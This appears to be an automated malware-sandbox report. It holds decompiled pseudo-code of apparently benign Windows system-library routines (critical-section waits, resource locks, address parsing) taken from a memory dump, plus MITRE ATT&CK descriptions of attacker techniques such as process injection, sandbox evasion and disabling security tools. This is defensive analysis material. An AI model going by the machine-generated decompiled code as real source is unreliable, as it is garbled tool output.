												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02923915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02905329(_t74, _t92);
													_push(1);
													_t48 = E029053A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x029053ab
0x029053ae
0x029053b1
0x029053b4
0x029053b7
0x029205b6
0x029205c0
0x029205c3
0x00000000
0x029205c9
0x029205c9
0x029205cc
0x029205d5
0x029205d5
0x029053bd
0x029053bd
0x029053bd
0x029053be
0x029053be
0x029053be
0x029053c0
0x00000000
0x00000000
0x02942269
0x0294226d
0x02942349
0x0294234d
0x02942273
0x02942276
0x02942279
0x0294227e
0x02942283
0x02942287
0x0294228a
0x0294228d
0x0294228f
0x029422bc
0x029422bc
0x029422bc
0x029422be
0x029422c4
0x029422cc
0x029422d0
0x029422d6
0x029422d7
0x029422da
0x029422df
0x029422e4
0x00000000
0x00000000
0x029422e6
0x029422e9
0x029422f4
0x029422f9
0x029422fa
0x02942305
0x02942314
0x02942319
0x0294231a
0x0294231d
0x02942320
0x02942323
0x02942323
0x02942328
0x0294232d
0x0294232f
0x02942331
0x02942336
0x02942336
0x0294233b
0x0294233d
0x02942350
0x02942351
0x02942356
0x02942359
0x02942359
0x0294235b
0x0294235d
0x02905367
0x0290536b
0x02905372
0x00000000
0x00000000
0x00000000
0x00000000
0x02942363
0x02942363
0x02942369
0x0294236a
0x0294236c
0x02942371
0x02942373
0x00000000
0x02942379
0x02942379
0x0294237a
0x0294237f
0x0294237f
0x02942385
0x02942386
0x02942389
0x0294238e
0x02942390
0x02905378
0x0290537c
0x02942396
0x02942396
0x02942397
0x0294239c
0x029423a2
0x029423a3
0x029423a6
0x029423ab
0x029423ad
0x00000000
0x029423b3
0x029423b3
0x029423b4
0x029423b9
0x029423ba
0x029423ba
0x029423bc
0x029423bf
0x00000000
0x00000000
0x02939153
0x02939158
0x0293915a
0x0293915e
0x02939160
0x00000000
0x02939166
0x02939166
0x02939171
0x02939176
0x02939176
0x00000000
0x02939160
0x029423c6
0x029423cb
0x029423ce
0x029423d7
0x029423d7
0x029423ad
0x02942390
0x02942373
0x0294233f
0x0294233f
0x00000000
0x0294233f
0x02942291
0x02942291
0x02942293
0x02942295
0x0294229a
0x029422a1
0x029422a3
0x029422a7
0x029422a9
0x00000000
0x00000000
0x029422ab
0x029422ad
0x029422af
0x00000000
0x00000000
0x00000000
0x029422af
0x029422b1
0x029422b4
0x029422b4
0x029422b6
0x00000000
0x00000000
0x00000000
0x00000000
0x029422b6
0x0294228f
0x00000000
0x0294226d
0x029053cb
0x029053ce
0x029053d0
0x029053d4
0x029053d6
0x00000000
0x029053d8
0x029053e3
0x029053ea
0x029053ea
0x029053d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029422F4

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 029422FC
RTL: Re-Waiting, xrefs: 02942328
RTL: Resource at %p, xrefs: 0294230B

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 32de17f738a704aeb8f43393402d75db271d43ee9dfb5e0432936d3ce578dfb5
Instruction ID: dab71d470abf1f3f71bd45da0e668573f158c6ecdfcfa403bc35e50494c6871e
Opcode Fuzzy Hash: 32de17f738a704aeb8f43393402d75db271d43ee9dfb5e0432936d3ce578dfb5
Instruction Fuzzy Hash: 4C511775600315ABEB15DF28CC80FA673AEBF94724F114229FD09DB280EB61E8458FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0290EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0290EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E028FDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x29c793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E028E16C0(_t39);
				} else {
					_t40 = E028DF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02923915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E028E01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x29c793c; // 0x0
								_push(_t85);
								_t44 = E028E1F28(_t71);
							} else {
								_t44 = E028DF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02923915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02962306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0290EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02924FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02933F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02933F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x29c20c0;
								if(_t85 != 0x29c20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0296217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02933F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x0290ec56
0x0290ec56
0x0290ec56
0x0290ec5c
0x0290ec64
0x029423e6
0x029423eb
0x029423eb
0x0290ec6a
0x0290ec6c
0x0290ec6f
0x029423f3
0x029423f8
0x029423fa
0x029423fc
0x0290ec75
0x0290ec76
0x0290ec76
0x0290ec7b
0x0290ec7c
0x0290ec7e
0x02942406
0x02942407
0x0294240c
0x0294240d
0x0294240d
0x0294240d
0x02942414
0x02942417
0x0294241e
0x02942435
0x02942438
0x0294243c
0x0294243f
0x02942442
0x02942443
0x02942446
0x02942449
0x02942453
0x02942455
0x0294245b
0x0294245b
0x0290eb99
0x0290eb99
0x0290eb9c
0x0290eb9d
0x0290eb9f
0x0290eba2
0x02942465
0x0294246b
0x0294246d
0x0290eba8
0x0290eba9
0x0290eba9
0x0290ebae
0x0290ebb3
0x0290ebb9
0x0290ebbb
0x02942513
0x02942514
0x02942519
0x0294251b
0x0290ec2a
0x0290ec2d
0x0290ec33
0x0290ec36
0x0290ec3a
0x0290ec3e
0x0290ec40
0x0290ec47
0x0290ec47
0x0290ec40
0x028e22c6
0x0290ebc1
0x0290ebc1
0x0290ebc5
0x0290ec9a
0x0290ec9a
0x0290ebd6
0x0290ebd6
0x00000000
0x0290ebbb
0x02942477
0x0294247c
0x02942486
0x0294248b
0x02942496
0x0294249b
0x0294249d
0x029424a0
0x029424a3
0x029424aa
0x029424aa
0x029424a5
0x029424a5
0x029424a5
0x029424ac
0x029424af
0x029424b0
0x029424b3
0x029424b9
0x029424ba
0x029424bb
0x029424c6
0x029424cb
0x029424cd
0x029424d0
0x029424d1
0x029424d4
0x029424d6
0x029424d9
0x029424d9
0x029424dc
0x029424df
0x029424e1
0x029424e7
0x029424e9
0x029424ec
0x029424ef
0x029424f2
0x029424f2
0x029424ef
0x029424e7
0x029424fa
0x029424ff
0x02942501
0x02942503
0x02942506
0x0294250b
0x0290eb8c
0x0290eb93
0x00000000
0x00000000
0x0290eb93
0x00000000
0x0290eb99
0x0290ec85
0x0290ec85
0x0290ec85
0x00000000

Strings

RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0294248D
RTL: Re-Waiting, xrefs: 029424FA
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 029424BD

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 40e160bd715a61a54452271416dcc687cfa0e0841e8e249476f9d5a05912a14c
Instruction ID: d1911e341f1a85477d02e80c444f3383193da9675f122ea0fea6841cc59c7d96
Opcode Fuzzy Hash: 40e160bd715a61a54452271416dcc687cfa0e0841e8e249476f9d5a05912a14c
Instruction Fuzzy Hash: 7E41B674A00204AFDB20DB68CC89F6A77EAFF85720F108A59F959DB2C0D735E941CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0291FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0291FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0291EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0291EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0291685D(_t167, 4) == 0) {
								if(E0291685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0291685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0291685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E028F8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E028EDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0291EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0291EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x0291fcd1
0x0291fcd6
0x0291fcd9
0x0291fcdc
0x0291fcdf
0x0291fce2
0x0291fce5
0x0291fce8
0x0291fceb
0x0291fced
0x0291fced
0x0291fcf3
0x00000000
0x00000000
0x0291fcfc
0x0291fcfe
0x0291fdc1
0x0294ecbd
0x00000000
0x0294eccc
0x0294eccc
0x0294ecd2
0x00000000
0x00000000
0x0294ecdf
0x0294ece0
0x0294ece4
0x0294eceb
0x0294ecee
0x0294eca8
0x0294eca8
0x0294ecaa
0x0291fd76
0x0291fd79
0x0291fdb4
0x0291fdb5
0x0291fdb6
0x00000000
0x0291fdb6
0x0291fd7e
0x0294ecfc
0x0291fe2f
0x00000000
0x0291fe2f
0x0294ed08
0x0294ed0f
0x0294ed17
0x0294ed1b
0x00000000
0x0294ed1b
0x0291fd88
0x00000000
0x00000000
0x0291fd94
0x0291fd99
0x0291fda1
0x00000000
0x00000000
0x0291fdb0
0x00000000
0x0291fdb0
0x0294ecbd
0x0291fdc7
0x0291fdcb
0x00000000
0x0291fdd7
0x0291fde3
0x0291fe06
0x02931fe7
0x00000000
0x00000000
0x02931fef
0x02931ff0
0x02931ff4
0x02931ff7
0x02931ffa
0x02931ffd
0x02932000
0x00000000
0x00000000
0x0294ecf1
0x00000000
0x0294ecf1
0x00000000
0x0291fe06
0x0291fde8
0x0291fdec
0x0291fdef
0x0291fdf2
0x00000000
0x0291fdf2
0x0291fdcb
0x0291fd04
0x0291fd05
0x0294ec67
0x00000000
0x00000000
0x0294ec6f
0x00000000
0x0294ec6f
0x0291fd13
0x0291fd3c
0x0291fd40
0x0294ec75
0x0294ec7a
0x00000000
0x0294ec8a
0x0294ec8a
0x0294ec90
0x0294ecb2
0x0291fd73
0x0291fd73
0x00000000
0x0291fd73
0x0294ec95
0x00000000
0x00000000
0x0294eca1
0x0294eca4
0x0294eca5
0x00000000
0x0294eca5
0x0294ec7a
0x0291fd4a
0x00000000
0x0291fd6e
0x0291fd6e
0x0291fd71
0x00000000
0x0291fd71
0x0291fd4a
0x0291fd21
0x0292a3a1
0x00000000
0x0292a3a1
0x0291fd36
0x0293200b
0x02932012
0x00000000
0x00000000
0x02932018
0x00000000
0x02932018
0x00000000
0x0291fd36
0x0291fe0f
0x0291fe16
0x0292a3ad
0x00000000
0x00000000
0x0292a3b3
0x0292a3b3
0x0291fe1f
0x0294ed25
0x0294ed86
0x00000000
0x00000000
0x0294ed91
0x0294ed95
0x0294ed95
0x0294ed9a
0x0294edad
0x0294edb3
0x0294edba
0x0294edc4
0x0294edc9
0x00000000
0x0294edcc
0x0294ed2a
0x0294ed55
0x00000000
0x00000000
0x0294ed61
0x0294ed66
0x0294ed6e
0x00000000
0x00000000
0x0294ed7d
0x00000000
0x0294ed7d
0x0294ed30
0x00000000
0x00000000
0x0294ed3c
0x0294ed43
0x0294ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 0291FD94

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 6eda1658a92fa53c460ea5f86e421700cb5e3df7c317c5c1d6a9966d1b7acf1f
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 1F919D76E0030EEFDF24CF9AC844BAEB7B8FF45309F20846AD455AA591E7304A55CB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

